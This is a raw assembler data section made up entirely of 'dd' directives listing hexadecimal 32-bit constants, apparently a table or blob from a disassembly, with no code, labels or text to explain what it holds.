dd 0EA229A01h, 4E87A2DFh, 0FC5C4A0Fh, 0DB5830E1h, 16878A9h
dd 669D7D32h, 4B4EF542h, 0DB8AC2Ah, 0F1A7CF52h, 6C36367Ah
dd 46157C77h, 956BAEDCh, 21E411A5h, 823627C2h, 0E51F10A3h
dd 0A7BD8F4Ch, 0F6A43186h, 0C592BBF3h, 7562399Bh, 0BB9802Bh
dd 8E42F51Ah, 0BBBF0896h, 68458D89h, 67C708D2h, 6053CCBBh
dd 4CB64CEFh, 1AC5AAD6h, 0FB9AC8EAh, 0E9986664h, 6D729689h
dd 0D69BC444h, 468F1CFEh, 0A5693447h, 0AC892E32h, 66C63CDEh
dd 0EAF8F087h, 5C734802h, 75B167C0h, 1638882Fh, 322784FFh
dd 0C31C51E3h, 0D2DB4864h, 0C3B18353h, 70E48B00h, 1F6C0AE8h
dd 8803AD74h, 217C0FD5h, 4A8CB285h, 0CBDE6B28h, 71F7F304h
dd 0E6CF1DEBh, 6EC6EA7Ch, 51BA5753h, 28CDA7E3h, 656E72F3h
dd 0F3D02FEFh, 566756F5h, 0D70FE387h, 5E00CF08h, 0F12E82FFh
dd 0D2D1D790h, 0C38F26E6h, 8ECC3B58h, 297B25ACh, 6E0B83Eh
dd 0BDC19CC4h, 0A97C7C9Fh, 47303A23h, 399AF922h, 0F996AD28h
dd 638C70ADh, 0D22B36AEh, 0C8B56345h, 0BA352A6h, 0F085068Ch
dd 0CE076FD8h, 3E3BDED5h, 37455007h, 0A9175A66h, 0BB55F67Ch
dd 2E5AB96Dh, 1DC27CC0h, 84A2AA7Dh, 8F4F5C78h, 0A15EAEA4h
dd 35AE2E1Eh, 1F7BEEB2h, 0D1BA708Eh, 0A403793Fh, 11083FA7h
dd 0C4FB7378h, 0AA7DFDA1h, 899C8B1Dh, 829DEA31h, 86E89A98h
dd 4BEF3B88h, 4AB34C1h, 128EEE87h, 2C3C64AEh, 0E85C54AFh
dd 0C18E7B95h, 21C72B9Eh, 31F9F0E4h, 2C256325h, 55AD630Fh
dd 1CFD32ABh, 4085A24h, 44C334CCh, 0AAE1172Fh, 37217288h
dd 0FADBF87Ch, 3A96056Eh, 4FCCFB6Ah, 2D5EAC9Bh, 0BE50C227h
dd 0B98D80E3h, 0AD9120Ah, 55161DE2h, 1E2EBF37h, 0C515BBE6h
dd 31399895h, 559B0A1Fh, 0BA61E359h, 9DDC58CAh, 7108815Bh
dd 0F91AE6C9h, 0C6ED6096h, 25EB8634h, 590F6FDh, 3FE46EA4h
dd 0DBF8493h, 0C90AE0B3h, 0E6F061C7h, 38EB287h, 73F2F1FCh
dd 0DABA13F2h, 7DB81B89h, 6780940Fh, 0A5987360h, 0AAF8DA86h
dd 0BA370BA4h, 0BAC226BCh, 0D679294Dh, 35AD81EEh, 0BDE1226Ah
dd 922FAA8Ah, 8B23EA68h, 2C74EEE2h, 0D9B632C1h, 4D96756Fh
dd 428FCB6Bh, 74D2BFD4h, 98D67E62h, 8FCDF8ACh, 76E3F1EEh
dd 7C271CAAh, 83CBD463h, 0D34A52EDh, 0C8B70F9Fh, 0F0D5B045h
dd 56E77346h, 521A598Ch, 3562B99h, 83405356h, 557F3003h
dd 0DD935C74h, 7941AB5Fh, 2806A036h, 0C779C99Fh, 0E51078B5h
dd 8A406B21h, 0A2B34AB1h, 0DC0B4FAFh, 69CBE42Ch, 3F3D3163h
dd 1A813EABh, 0D54DCBAEh, 0F23A4829h, 0BAB7ED82h, 0CC9FD63h
dd 758C6FD5h, 7BC49669h, 4E361792h, 0DB531FE9h, 0FC9FA0E7h
dd 42821243h, 0C7003EB6h, 4D24B7C8h, 2DEECF45h, 142B49DBh
dd 0D3913581h, 8A50C0E5h, 60C5EF4Ah, 7568BEDAh, 0F1724D8Dh
dd 83B1DAFFh, 3FFA0B65h, 4FC1F7E4h, 0A7071B14h, 15BE8838h
dd 0C11E2D5Eh, 5E6A338Dh, 2D2EC6FAh, 3A044F8Ch, 5AE85B40h
dd 417A49ABh, 1DC1FBD0h, 82FF7E4Fh, 0DD0193EEh, 225D831Ch
dd 4CDB09A3h, 6404957Dh, 0C388B7EBh, 81B6E6C0h, 65581ACEh
dd 0A186DE2h, 0C507330Eh, 0A9F7B912h, 919C1EE3h, 0E45E5C8Eh
dd 529D6EE2h, 0D9D979C6h, 0ACA330E5h, 0E060FA30h, 38627D68h
dd 0E637E527h, 0C9D988C1h, 8638D791h, 3AA84DE1h, 812254ABh
dd 674BEAB1h, 0C6624E19h, 8AD7C93Fh, 2AA81182h, 779D8E55h
dd 33294ABDh, 9439B575h, 945D38BEh, 46A479E5h, 9685F0ABh
dd 825E86ECh, 0BC62A124h, 0DACDC14Eh, 889A6F15h, 88BE840Ch
dd 0CBE58B15h, 72ABF8E4h, 135DFB66h, 3F07C451h, 629A3AFDh
dd 4294C2E5h, 645779A7h, 0D4C577BAh, 0EECB07CCh, 3F41F45Ch
dd 6D3CD17Dh, 99A70222h, 0AC7BD401h, 95A68892h, 0D515979Ch
dd 4D942DF8h, 46D2630Bh, 0E201B1E5h, 0FB28A6D7h, 0D843D33Dh
dd 1CF74E36h, 318E2CD5h, 9030B6A3h, 0E7CE28D0h, 47B71329h
dd 0DA88758Eh, 9F8FA5B9h, 0AC57F09Bh, 59519E5Eh, 26A2EF76h
dd 7D1D56D2h, 70505BB8h, 1929047Dh, 231F8BC1h, 99B45571h
dd 0F1CEBD3Ch, 2CC68389h, 187019C7h, 5FB5BDCBh, 0B8A4EA60h
dd 65FB2436h, 81146C0Ch, 2180C978h, 220A352h, 0EB3E5E4Dh
dd 0D575C6BEh, 7F5057F5h, 661E51ADh, 463E8F5Ch, 2959EBBDh
dd 9AB76105h, 35C33802h, 8B8CF149h, 7894836Ch, 2708432Dh
dd 77F4073h, 0BA68FD27h, 0DD2A8A6Eh, 2569BB46h, 0B05FDA30h
dd 69DC6D2Dh, 0D943C9FEh, 0D5B3EDE4h, 2F17B2AAh, 27C04A4Dh
dd 9F05D850h, 0DF0136D0h, 0D62D3C1Ah, 69934AD8h, 0D78878B1h
dd 0DB49F991h, 0E6DD0D94h, 0CE63660h, 248BA103h, 0C9AC1F2h
dd 7F19FD27h, 0B1E0EA7Ch, 7AD2ADA8h, 63B41AFh, 3A12B6DBh
dd 0D18641BAh, 4EF93A0h, 0B00577D7h, 0C0BF8D52h, 2E62731Ah
dd 0CB56C6Eh, 8B58ACCCh, 9EA2DADBh, 9C3038D8h, 1467889Bh
dd 0A8512D76h, 0D7952CCCh, 7D1AFFF7h, 773698D2h, 63232207h
dd 0F3D26FC2h, 2A098ACCh, 0E85967EBh, 0A4C61296h, 3C71FD4Ah
dd 0B67FBE95h, 0EFE985CAh, 0B3CA0527h, 1BDDF6DDh, 7C05C706h
dd 14621D95h, 0DF6CEEBDh, 9316FBDh, 3A363CFh, 9961F458h
dd 0C4DCD84h, 90CA697Dh, 4804EFCAh, 0DBED4D74h, 7C70F268h
dd 26FDC814h, 2110CFADh
dd 0F7E041FDh, 0BD20E788h, 434023B2h, 806A8462h, 5ABC3185h
dd 0C2900D79h, 840283F4h, 21E07F91h, 0F931B6F8h, 1F536AD7h
dd 916D72D0h, 84ED5685h, 43C609A5h, 0F2CF1E4Ah, 798280Bh
dd 0FD053D7Ch, 0B1A84A58h, 38C83D06h, 0DBAC48E9h, 0B0D80219h
dd 958F3AEEh, 89C1CE35h, 0FA682AA6h, 3F36F08Dh, 0A2DADC6Dh
dd 3B0D33B7h, 0E1EC693Dh, 0A96A4389h, 0EC89DD45h, 730284F5h
dd 60CE85B1h, 5A1FD675h, 0B061B661h, 4DAE382Ah, 774098E2h
dd 0A3711844h, 95613F8Ah, 3E6DAA3h, 35DF8A1Fh, 0D7BF97B4h
dd 24E3775h, 0F8488B1Ah, 0D38A6809h, 3486A4A0h, 394552E6h
dd 0D329DB8Ah, 0C951D9C4h, 3B976776h, 5D18BEE8h, 97FE306Fh
dd 28BE637Ah, 0F45539D0h, 0B3D59992h, 86E179EBh, 0E17EBF56h
dd 59025CF4h, 0BDFBD310h, 22D80B7Fh, 90400A94h, 56382331h
dd 4B949F4Ah, 0B01CFA5h, 0A94741CCh, 7F5E018Ch, 8D4DBBAAh
dd 1CDE26F2h, 0B9BB72EEh, 0B5D2EEE7h, 99B9DABBh, 9935E614h
dd 1FA31D20h, 3B664F48h, 1CDB2A86h, 159DB900h, 63B5B365h
dd 0F3C24E0Ah, 0FFFF560h, 4D28F7E7h, 0CBED196h, 96F187BDh
dd 0D12A373Ah, 5B33D140h, 871E5E47h, 0BE0E613Ah, 228BE0BEh
dd 0C998BEBFh, 0E10ABED6h, 0EA4148F8h, 8F41E33Eh, 0A2059C29h
dd 40DEA584h, 56E4F06Fh, 96A30F94h, 5590E6EEh, 33E7F062h
dd 0D610DECFh, 480EAFEEh, 0F560D576h, 0CC4BEBABh, 0C44085E5h
dd 5A2C9400h, 0D5CDEB3h, 0F9802A99h, 0A5E9B5CEh, 1D483493h
dd 44E5D809h, 329D98BFh, 0D727E371h, 7F51E6C1h, 7C2A4B64h
dd 27F1D503h, 44D5598h, 0BC7289ACh, 9D0771B5h, 0B6EB8445h
dd 0D9B694CEh, 0BBA13EDFh, 0C7C6AC69h, 0A5A11B43h, 2EC039D2h
dd 0F51925D0h, 7714E246h, 43B8387h, 7ABE3831h, 85A19ABFh
dd 566C32F5h, 5A52526Fh, 3248FB7Fh, 7E475C27h, 184D2B82h
dd 0C56982ECh, 0A0E9E26Ah, 5FAAE99Eh, 8435A1A0h, 396773CAh
dd 741B18B7h, 0CE232D7Eh, 76D0F145h, 492AD858h, 55BBFBF2h
dd 1306E73Dh, 2A5E023Ch, 0CA713AE5h, 0E6BFFDE6h, 90BC5B45h
dd 2E3748FAh, 9B1CAF8Dh, 7D13853Ah, 8A43F436h, 0CC7D4FC1h
dd 0E91BFA5Dh, 0CE75A46Eh, 41AEE2EDh, 2D6D25C3h, 2FCA5845h
dd 9CB60203h, 0AFD0ACF4h, 0F82BC6E4h, 0D958AEA3h, 0E22A6D87h
dd 0C65AE02h, 0E9320B21h, 0CA7D9050h, 3DB9FECAh, 46E791F1h
dd 4A730DF0h, 35475F3Ch, 0FF98FEDFh, 0B998AA7Ch, 0D4A5186Bh
dd 3C89DF6Eh, 51BD23E8h, 0A28EAF47h, 81CA99EAh, 4D622CF6h
dd 29E58F36h, 0FAB3350Bh, 57AD9182h, 31C4E7AEh, 65E156AAh
dd 3C5416FEh, 91C8DF65h, 347E6EA9h, 0EDE76894h, 5AAB1342h
dd 0FC4B6A86h, 4F3F1F6Ah, 86640C7Ch, 0CE2D3529h, 621451FFh
dd 0E7CC5B33h, 92CD0698h, 0B457BF7Eh, 0F35EC31Ah, 0CFDFDEB2h
dd 2EEF7431h, 2D6F104Ah, 8B5BDA7Ah, 0FE239D26h, 13FB86BDh
dd 0D0F78B7Ch, 29ADA252h, 830A52F6h, 0FABA5F28h, 0C5A3393h
dd 801F3D49h, 0FB950972h, 0C2B31B90h, 0AD2F6184h, 7D52AF60h
dd 2B1248BBh, 0C8503936h, 907AED63h, 408B7DCFh, 0B947BBD2h
dd 3FEC15Dh, 596FED2Eh, 44E7C268h, 5C204CC3h, 0C8557DBAh
dd 8CA40605h, 0E85110CBh, 0D6CEC673h, 55EB8D4Ah, 99FC4B3Eh
dd 0CDC18DE3h, 85CC1CE7h, 95E48AF0h, 1A5A14CBh, 960B80DBh
dd 36FA800Ch, 0D5FBA932h, 96DB6A16h, 3158EE0Eh, 74602691h
dd 8CC4A949h, 22441677h, 73EDB642h, 75C3E862h, 0F83C815Ch
dd 32014168h, 0BBD48001h, 6C6FFEB8h, 0C8963891h, 573209C2h
dd 168AF561h, 6E4B8122h, 0F912B3B7h, 4E53083Ah, 0A4E84DDh
dd 6899D286h, 6DD4240Bh, 17F6DFD5h, 0D53F28F7h, 6F6315F8h
dd 679A684Eh, 0B27D333Eh, 2425C1C9h, 0EDF6B56Bh, 86A23104h
dd 28BCABC1h, 37D61887h, 82D25B55h, 9404A9E9h, 85EF9740h
dd 320B0F63h, 840608FFh, 0E716D959h, 0D08CE923h, 0B8DB0318h
dd 257B8558h, 0C2C49FB9h, 0CF50A2B0h, 35B9E4ADh, 0D0F570B7h
dd 78448DFDh, 0D44A4725h, 4D8B7257h, 8F53D39h, 0F967DB67h
dd 0D9D1E6C1h, 2F1C71A0h, 63E6081Ch, 9C09D4F4h, 1DADB67Ch
dd 1882400Ch, 4AD7560Ah, 92252D1Fh, 0B693D0A9h, 1445D2C9h
dd 0DD2BFD77h, 91408DF1h, 312A2B62h, 4F094987h, 42B8FAC9h
dd 0F4B6B04Bh, 22DFBC6Ah, 0E231AD58h, 0CEB9BA2Ch, 0DD72965Bh
dd 816CCCB5h, 5285CDB8h, 0A918D101h, 97BD6A8Eh, 0AF3D486Eh
dd 0F0E901FDh, 7E52CA3Fh, 0A9D85910h, 223B0D61h, 4BD325EFh
dd 7A2E8FCCh, 54BED3BAh, 1C0BB031h, 99A5273Fh, 0FA6616A2h
dd 448686CFh, 194F2A17h, 11F40156h, 9BA9BFC0h, 219CC929h
dd 7CC5CF51h, 0CAE45CE8h, 4A8EC165h, 9196BC4h, 8CD9A997h
dd 70D9DB80h, 22E2498Eh, 0F273F80Ch, 3C046195h, 0AD02B97Eh
dd 0D9B7E94Dh, 162031B4h, 112C0675h, 12AFFC49h, 0B1F8AC7h
dd 0EC9453AEh, 0F680B6BCh, 0DFCA4C72h, 77EEB4DBh, 52D86F98h
dd 8ABA4038h, 47AE36D1h, 4041A988h, 749499E8h, 0A1E85015h
dd 0DACE6BB9h, 226D8B96h, 25D4A6Eh, 0AA16DB3Dh, 0B3D88D23h
dd 0C0CBC9C2h, 0AE9344FDh, 0E4124CDFh, 92358615h, 131EEC9Ch
dd 0BB3615EDh, 0FC535BB1h, 0E1FC2CD4h, 6C44D3EAh, 178E4D28h
dd 0DF0D0F3Ah, 0E31F5A02h, 0B5FA340Dh, 263B8CDFh, 46C0A87Dh
dd 344CE637h, 58161609h, 2137AC84h, 6160CFE4h, 67AAE532h
dd 69FE9D68h, 167180A3h, 23889177h, 3B94B16Fh, 6082EC3Fh
dd 0C03C6F1h, 0CDFEC189h, 0E1CAF03Bh, 572CDF8Ch, 85581F76h
dd 6344E579h, 5F16769Ch, 6569145h, 30940D53h, 2CBFA4D8h
dd 93DAF3A5h, 4594BD96h, 6B8898Dh, 0D9467CB6h, 0D5C346C9h
dd 3B5C2FEDh, 0AB9BA651h, 0EBDCB63Ch, 760642F9h, 0F92FC23Ch
dd 9EC86EF3h, 0E1AB8CB8h, 197103FDh, 8AAE3C32h, 0F2FA6DD6h
dd 8837FF3Fh, 4932A472h, 92F0541Dh, 887D0B30h, 2A766A5Bh
dd 310AE090h, 16D94171h, 0F07B2E22h, 11F7248Eh, 242E2E2Bh
dd 20D16CF2h, 5F245D52h, 0DC759241h, 0E20499A0h, 6DB3540Bh
dd 9481C1E0h, 13D9671Eh, 0B0D94CA6h, 3BE27530h, 2007D932h
dd 371CCE79h, 0FE5463DEh, 4728AD50h, 0C7D8A4B2h, 0DAC308F6h
dd 389F437Bh, 8CA2FE7Ah, 161DA862h, 0A577FE5Eh, 0FCCDD719h
dd 0B43D7B37h, 419C289Ah, 59712581h, 0B9820C0Dh, 0C52787A4h
dd 0FC0A2222h, 31881368h, 4CF9BB8Eh, 9AAFD794h, 35BB1E22h
dd 536CD66Bh, 3B0F56Dh, 0EF6E602Bh, 0BD991839h, 176527E9h
dd 0D388773Ch, 358A29D4h, 34F5FA4Bh, 8EF9584Dh, 0E692B13Ch
dd 0EBD78E0Fh, 6F164024h, 0D19484C9h, 728523B4h, 2B379591h
dd 26D59773h, 0B65A965h, 9C4329D6h, 0EE49E162h, 7E583A23h
dd 0FC42894Ch, 45BC9922h, 0A4C40D5Bh, 0CA68E002h, 9CD177E5h
dd 89FB624Ah, 0FEEB6D33h, 3BF9E69Fh, 7B68A86Ah, 6BF2BC8Ch
dd 60AEBE94h, 0EEF9766Bh, 0DD9526E9h, 177DABD8h, 0D70300EBh
dd 56C08505h, 35CC1F7h, 1110EEFDh, 64EA6A92h, 43865974h
dd 0AB6D3F3Fh, 8211F2h, 20441EBEh, 0B5D41F50h, 0B24FA9D5h
dd 0E62E5D2Bh, 0FD7BEC97h, 0D7EBA4BCh, 0D21D04AEh, 0EB37E622h
dd 0B03FDD8Fh, 5DEF0519h, 0D3C852C7h, 675EE3E2h, 0F9E8B928h
dd 0F0D7A28Bh, 0AE1CBB2Eh, 4FD06F96h, 0D4E023F7h, 2BBC43E2h
dd 0F06729A6h, 0E4B92A67h, 381CE65Ch, 0F6CEEE0h, 0F032D21Dh
dd 0C7AD3E30h, 153CBA3Bh, 537F864Ah, 0ED8D1E5Bh, 417E2F12h
dd 13C4FE88h, 6603D53Ah
dd 0C826ADF4h, 20ABC2E5h, 0FCAB7F40h, 451C25BBh, 0EBB5A21Fh
dd 925C5144h, 376E3B42h, 0F1B1E355h, 44AA6072h, 5D38F7E7h
dd 0AE660827h, 6F596B51h, 99127A9Dh, 0AB61237Ah, 0E1C1B751h
dd 0CBB0C39Bh, 0B1232D59h, 724029E0h, 1D06CB8Dh, 0AC7A6432h
dd 8AE40FAAh, 0B6A72C67h, 8433CA80h, 7A31A3FFh, 586718FCh
dd 0FB1B4C94h, 1C2A6CE2h, 25410846h, 56284359h, 215E7B69h
dd 0CC4C1525h, 0CE252BE9h, 39970630h, 82E30339h, 3DF5D713h
dd 43C3989Eh, 0E7346178h, 0DE2EA97Fh, 41DAE61h, 5190263Fh
dd 44079B31h, 2AECDE96h, 188843Ah, 0D7F59861h, 587F1F77h
dd 42733B0h, 0E6BF427Ah, 8775C607h, 1B7B0052h, 300E65A8h
dd 74E6EFA3h, 15D35E2Bh, 8841C239h, 12687B57h, 0C0134642h
dd 0E6264C58h, 0D823FFA2h, 2D6AC315h, 0AAB78B01h, 307E6C04h
dd 0D1524E78h, 4243EF7Dh, 0C7163B15h, 3252E1A5h, 0CF348588h
dd 3DEDB7D7h, 0A85D741Dh, 0DEBECF08h, 0B79E7FE6h, 9184C17Ah
dd 4B5ED1FCh, 0CFDFEF59h, 0DE796B68h, 48716AD1h, 0FD2FAD88h
dd 72154E01h, 447D82E4h, 0AFEA900Bh, 76EC2B42h, 337A1F2Dh
dd 9A6CB267h, 46226CA4h, 9C3881DCh, 6E0BECF8h, 0AED0E977h
dd 708C7B06h, 5390DC15h, 0E044F873h, 0CFFCF961h, 0DF0C7D0Ah
dd 4C392695h, 84B6BBA8h, 90B6BA04h, 0B0EE562Dh, 0FB25C0E4h
dd 728C6181h, 0EBE8A9DBh, 0B148E34h, 0EB415793h, 16421AD1h
dd 0D88DFB92h, 1061E13Dh, 93C9AE52h, 0DEC5D156h, 7CF6CE04h
dd 0E535A8C9h, 9174A17Ch, 7693708Eh, 87266CE5h, 7CC70488h
dd 0CDA12985h, 33167F52h, 0BF0925A7h, 6759104Fh, 9BD31192h
dd 0C8AE2D71h, 0CBE30F88h, 9B1BFD5Dh, 0F3018957h, 0BC1447DCh
dd 5025A4E9h, 1C1244E8h, 7B44ADFBh, 4F7D3266h, 0A91D51FBh
dd 251B35F9h, 0E1F969C9h, 239B2CEAh, 322B69D3h, 43C796A5h
dd 0C8A0E37Dh, 0C9CA67A5h, 0B265142Dh, 92AE4EEFh, 0B080B52Ch
dd 0D2EC46BAh, 1D8904F3h, 0F5ACC310h, 232A8694h, 3E25C95Fh
dd 0D48C333h, 0AFD4C8FFh, 0D769E0FFh, 0A955B0C2h, 0D7B88BC5h
dd 194634DEh, 9E8D1430h, 738113FEh, 460A4F72h, 71FD6C50h
dd 77448F94h, 0D24DC98Bh, 0F4C7068Eh, 7668BF33h, 63408836h
dd 1E0868D7h, 0D6ECD426h, 4806AD20h, 0EDC3DB38h, 0CAFA84h
dd 7C73A277h, 81E92E6Ch, 7BA85746h, 0C24F5B3h, 0B7A85B47h
dd 8EFC3DDDh, 1F4E590h, 2A796C42h, 9201C9DDh, 5FE1DD6Ah
dd 3B24C7BEh, 8B49153Ah, 26ECC0B8h, 97B58F5Ah, 61E0586Eh
dd 2BD22F84h, 9C2E99F7h, 0D59BF119h, 213B9197h, 0C023FDF4h
dd 970C3491h, 26D7466Ah, 0EC2086CDh, 8492693Fh, 31EB11C1h
dd 0D80BBA61h, 6A8256F0h, 4AB8C33Dh, 0B33AC4F1h, 54977671h
dd 5883BCC3h, 0C07B1519h, 7AAA4351h, 0BBD8F64Dh, 79425A1Ah
dd 0B86C2E6Bh, 1D85212Ah, 5DB6CA7Ah, 72A881A4h, 435C6BFCh
dd 26EC6212h, 0A7EADFB0h, 0DF2F356h, 0EBBDBA53h, 56A45605h
dd 89F67927h, 58474F09h, 1E0F1237h, 69D6BBCEh, 0E7F3F1F2h
dd 5BEB498Ah, 0A984F33Ch, 33DA068Ah, 0B327A2EEh, 74244CE7h
dd 8173F54Ah, 88BB3C9Fh, 1F43A98Fh, 7BD05E60h, 77EDA4B0h
dd 0C383A379h, 0DF51D0E2h, 509A7BFDh, 0A615A366h, 8E8AF796h
dd 7325A87Fh, 0F2F71D7h, 4CF5C662h, 0C3C593B0h, 32B9E9CCh
dd 0F9FDBA2Ch, 6B08717Bh, 0D7410574h, 0FCF82338h, 28E2B2Bh
dd 2B19B68Fh, 36A8E1AEh, 1FB59C9Dh, 0FF9CF797h, 0BA6CF16Dh
dd 403527A5h, 0C85B95B2h, 0D7D915A9h, 0DA835AE7h, 0F9E9DD77h
dd 583B960Ah, 7B595214h, 0E2C6C60Ch, 1A40B7CFh, 91DE3CCDh
dd 3290C05Eh, 3EDA3C4Ah, 7848BF8h, 0DC50F6FEh, 9BB73B39h
dd 6D43384Dh, 9C5E5A01h, 0C5F22381h, 6FC0D1FEh, 0F0D0BCEEh
dd 44A7E583h, 8201ADB3h, 0ECE4A829h, 0A0059921h, 63BE0002h
dd 0A6E0DE95h, 85584C99h, 823B332Bh, 436D62CFh, 75DD46F4h
dd 47EC4419h, 5B8660E3h, 0F3B113D4h, 0A9FDB37Dh, 62C31108h
dd 9D1F6359h, 52FAD704h, 80A4C820h, 0FF136286h, 0D6B97FF2h
dd 0F9ED1AE8h, 127F0600h, 863A63BDh, 0B6B05532h, 0DEC97C3Ch
dd 16B1F35Eh, 79C73521h, 968B3A44h, 35E2FA36h, 335E3486h
dd 0E524435h, 0FEC8F0EDh, 3FE136F6h, 6116942Eh, 169CA6FFh
dd 3658B503h, 58B9CCEDh, 0D0099343h, 0ED02998Fh, 7C4DE810h
dd 8C5C37ECh, 0C72C193Dh, 49712E9Fh, 0A5C31616h, 1FA654EFh
dd 9249EC95h, 2E2AEB04h, 23819473h, 20B705B8h, 3F5A7CAFh
dd 0EA604777h, 0B38847BFh, 7311382Ch, 0CA4B2795h, 0E1B086h
dd 0F722F020h, 0E2D30CB0h, 229D3A73h, 990CCA8Ah, 0ACD4FC59h
dd 9D11EE38h, 0B1D8A328h, 6BE83736h, 3689FE2Eh, 9C3628A9h
dd 88041B28h, 98AA6562h, 0A0DAD706h, 0F114F054h, 4AE09A53h
dd 0A60B8125h, 1DC7698Dh, 8DCB790h, 0DF336609h, 0B22FFC0Dh
dd 1D4A9E02h, 0F20DCA8Eh, 472ADC37h, 0BAD1F280h, 0A5881CD8h
dd 5EA9B477h, 44D9B131h, 1CCD813Ch, 61798525h, 26F5E1C1h
dd 45FBE5Fh, 0D31B7DD4h, 1EEC1857h, 785C0807h, 0C2F94A4Ch
dd 271136C6h, 594D1868h, 0DEEFEF03h, 7ADA9972h, 0E35B2145h
dd 41DA32F4h, 1B37D603h, 8675167Dh, 56ECB243h, 0D1CCB0D7h
dd 51C06931h, 9BDA8605h, 0E977FD64h, 799D6B27h, 5423244h
dd 2FC4799Ch, 0C01BA615h, 7B81FA1Bh, 148A840Dh, 0E1D671D3h
dd 0DB79A977h, 7D873007h, 41216D43h, 0CF2B2F31h, 2CF1DF8Bh
dd 3E3D2017h, 0C10E89BBh, 53D1718Fh, 61F5A7FEh, 6D95EB42h
dd 2B8BEDC2h, 0F8046ED7h, 0C7A4F204h, 871A5C09h, 16A625D8h
dd 5A71CB8Bh, 9E5613C8h, 7F6D84E5h, 0FFA67CE0h, 0DF4D7A21h
dd 5869F28Ch, 845F8D7h, 989A5F6Dh, 3064693Ah, 2C129EBFh
dd 0FDB1746h, 0C6360252h, 7C007FB9h, 793D2E49h, 0AD929079h
dd 166BE6A5h, 0A02C94C7h, 0DD5656BEh, 4BD5017Eh, 32F78F36h
dd 0FC0AE491h, 68690E59h, 888A531Dh, 85D9DE53h, 0A5C1B66Ch
dd 7DC41AE7h, 0A2576536h, 0F82F2BF4h, 816D4B9Fh, 1CBE50DFh
dd 1A5371D1h, 1815EFD3h, 96831D7Eh, 0F3820223h, 7410CC4h
dd 0CD555022h, 93A42269h, 9A18C73Ah, 0A663961Dh, 0F90F7522h
dd 8416EA1h, 0B128EB8Fh, 37A7AE86h, 6E8AB6FFh, 68CCE37Dh
dd 6AB91B67h, 2393DF4Dh, 68A7F3AAh, 30858660h, 0B1C6D879h
dd 7F250644h, 0AACA3640h, 54247893h, 0A0CB468Bh, 5EDF6296h
dd 92F24312h, 0E2700951h, 0E39F11CBh, 19F7F07h, 0EEE0AA35h
dd 95CD8A2Ah, 9E8AF415h, 0D02A3FBAh, 7AC83631h, 96346E12h
dd 5FF4FEFFh, 68718F98h, 6AF1E019h, 1E26A33Ch, 7CFEC8D2h
dd 0B55CEB6h, 53CB6F66h, 68EFCC7h, 93262A0Eh, 81BD8BE5h
dd 0E7137D38h, 52B153BCh, 0CDB707B5h, 0F0A003F1h, 0FF28731Dh
dd 0BC6CA06Eh, 0E49BA66Bh, 3B53E946h, 0F6464FDAh, 3896DECEh
dd 4066E801h, 0A20D8BECh, 11A22F7Dh, 0C44F98C2h, 946AB7F4h
dd 3DA8AF4Dh, 0E93B936Ah, 0DD2EF34Ah, 3E049E3Ah, 3770DFDBh
dd 35E6FB75h, 80A4F644h, 0C0691971h, 74A14779h, 1B84B6F5h
dd 0C8A9A3D0h, 173D0D0Bh, 0CF19D245h, 6113CFF8h, 0A6D3CC30h
dd 0E46E3603h, 9D2EE50Ah, 7D386546h, 0F2B9CBD1h, 0E477A1Ch
dd 66141073h, 91698069h, 0C2EB984Dh, 0EFA737FDh, 3D4652DBh
dd 6BB8FBEEh, 0FDD34DF1h, 52D919E1h, 0D8A70C8h, 0C99F0E14h
dd 17E4EDB5h, 70D71D6h, 0DC89CEF3h, 0FDD75052h, 0C1C6641Dh
dd 6E4C91Dh, 0F033DA38h
dd 7B933D6Ch, 6B52C275h, 57406C35h, 0F8AA3F0Bh, 62F84208h
dd 7280F3Fh, 8B912456h, 6AB48318h, 44223CAFh, 0DDF60FAh
dd 35166FE8h, 321F7E11h, 0AB1B400Dh, 3104A696h, 0A05809EDh
dd 0CCC97740h, 0AA7BC877h, 0A5B03D7h, 0EA440FECh, 82A7C80Fh
dd 0BDA4E206h, 0DFED7665h, 50C0BAFEh, 3B3E391Fh, 0A8113594h
dd 0A3117134h, 47FA169Fh, 4C06605h, 6F0FEE5h, 0BD5AE954h
dd 0B8DDD51Bh, 0CC0D4BE5h, 0CB29B33Dh, 0A9295A83h, 0C6BAF96Eh
dd 0C0E28430h, 0E940F3CDh, 0DD7DEBB7h, 0E90B5572h, 0F3028CBEh
dd 0E21434B4h, 0ED16D8D4h, 0C0A9DB43h, 62AC522Ah, 7A0E9AC6h
dd 902245DEh, 87248DE1h, 9E725511h, 68C1E072h, 0C48E57E0h
dd 99168FCAh, 0FB3BBD73h, 0B263EC25h, 12BED4B1h, 220C8890h
dd 0F5BD348Dh, 505237E7h, 0DB6C1D4Eh, 4C745A80h, 0C5E45B73h
dd 0FE441CDEh, 1CB1D7BBh, 5FB565A3h, 0A37D171Fh, 9E4E6852h
dd 8AD442ACh, 0B9BAA340h, 0CCA4B033h, 0D89BB36Bh, 0A83A7174h
dd 9F1BE635h, 0F0E2F74Bh, 0D3A0BC44h, 0EB3B57BEh, 24F3760Fh
dd 4AC2E87Bh, 0E2AA0F2Dh, 7EF9B27Fh, 0BB46FA16h, 0BB49F8BCh
dd 0C157EE49h, 928EF17h, 5FC50E7Ch, 9EC9D701h, 0E9F30B72h
dd 0FDA9959Bh, 7A1ED778h, 633B5C05h, 0BF0DF13Ch, 710C7EADh
dd 92E01C12h, 0EF9C55ACh, 0A79C2250h, 0E51585E4h, 3092E053h
dd 210C5554h, 7B5E219Bh, 7F6A676Ah, 0E5391321h, 0E42F4662h
dd 0AC801F61h, 0B6F7A76Bh, 0F4629938h, 0E23A2C5Fh, 88F540E0h
dd 60193B6Fh, 0F835AC74h, 35D55106h, 0C6FB7462h, 3FB0E5E2h
dd 671538CCh, 0CDCB3D50h, 0D75998B5h, 192E6105h, 0FB0F47CFh
dd 0E2350A68h, 0E92B6DF2h, 0B78FEA07h, 0EB5A58A3h, 0BAE66C72h
dd 41479656h, 30A8F39Bh, 0B685B2CFh, 778BE509h, 0E3D327A8h
dd 0B675BFBAh, 0CC107588h, 3535046Eh, 903B3787h, 0DCF19432h
dd 0A7C56F9Ah, 0F79B76BAh, 34453140h, 3558CDE1h, 0FEF68492h
dd 3451FF87h, 52A11FCCh, 74343A55h, 0CC96B00Bh, 0A07646A4h
dd 877DF879h, 0F74141B3h, 0DBA75690h, 37E0B325h, 0F0296D29h
dd 4E7A6250h, 1D7EE459h, 8481D5h, 5A92995h, 63E64E5Eh
dd 968DB87Bh, 0BA029D6h, 26862184h, 0A65702C3h, 0F88C1FC2h
dd 87DE514Fh, 634D70F3h, 0F23C95Eh, 0C82EE08Fh, 4BDD94B9h
